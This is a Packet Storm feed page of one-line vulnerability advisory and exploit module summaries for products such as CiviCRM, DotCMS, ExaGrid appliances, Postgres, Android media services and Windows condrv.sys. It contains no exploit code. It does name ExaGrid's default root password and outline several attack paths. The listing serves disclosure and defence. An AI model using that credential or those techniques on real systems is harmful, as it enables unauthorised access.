Packet Storm - Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
Updated: 14 hours 39 min ago
CivicRM version 4.7b3 suffers from a remote blind SQL injection vulnerability.
DotCMS version 3.5 Beta suffers from a cross site scripting vulnerability.
DotCMS version 3.5 Beta suffers from a directory traversal vulnerability.
ExaGrid ships a public/private key pair on their backup appliances to allow passwordless authentication to other ExaGrid appliances. Since the private key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. Additionally, this module will attempt to use the default password for root, 'inflection'.
Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. Most commonly this is Perl and Python. When enabled, command execution is possible on the host. To execute system commands, loading the "untrusted" version of the language is necessary. This requires a superuser. This is usually postgres. The execution should be platform-agnostic, and has been tested on OS X, Windows, and Linux. This Metasploit module attempts to load Perl or Python to execute system commands. As this dynamically loads a scripting language to execute commands, it is not necessary to drop a file on the filesystem. Only Postgres 8 and up are supported.
The GET_CONFIG and GET_PARAMETER calls on IOMX are vulnerable to an information disclosure of uninitialized heap memory. This could be used by an attacker to break ASLR in the media server process by reading out heap memory which contains useful address information.
The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media services can be tricked to return arbitrary memory locations leading to information disclosure or memory corruption.
Hikvision Digital Video Recorder versions LV-D2104CS, DS-7316HFI-ST, DS-7216HVI-SV/A, DS-7208HVI-SH, and DS-7204HVI-SH suffer from a cross site request forgery vulnerability.
AccelSite Content Manager version 1.0 suffers from a remote SQL injection vulnerability.
Monsta Box WebFTP suffers from an arbitrary file read vulnerability.
Apple Intel HD 3000 graphics driver version 10.0.0 suffers from a local privilege escalation vulnerability.
WordPress Multiple Meta Box plugin version 1.0 suffers from a remote SQL injection vulnerability.
Perli version 2.6 suffers from filter bypass and script insertion vulnerabilities.
Eight Webcom CMS 2016 Q2 suffers from a remote SQL injection vulnerability.
MESS version 0.154-3.1 suffers from a buffer overflow vulnerability.
Quicksilver HQ VoHo Concept4E CMS version 1.0 suffers from multiple remote SQL injection vulnerabilities.
JPEGSnoop versions 1.7.3 and below suffer from a dll hijacking vulnerability.
SIDU version 5.3 database web gui suffers from multiple cross site scripting vulnerabilities.
SIDU version 5.2 database web gui suffers from multiple cross site scripting vulnerabilities.
One change in Windows 8.1 from Windows 7 is the introduction of the console driver (condrv.sys) which is responsible for handling the management of consoles. It contains a method, CdpLaunchServerProcess which creates an instance of conhost.exe. This method calls ZwCreateUserProcess which means that the system call runs with kernel permissions, it also passes a flag (0x400) to the system call which indicates that the new process should not be assigned to the parent job. This allows for the conhost process to bypass the job restrictions.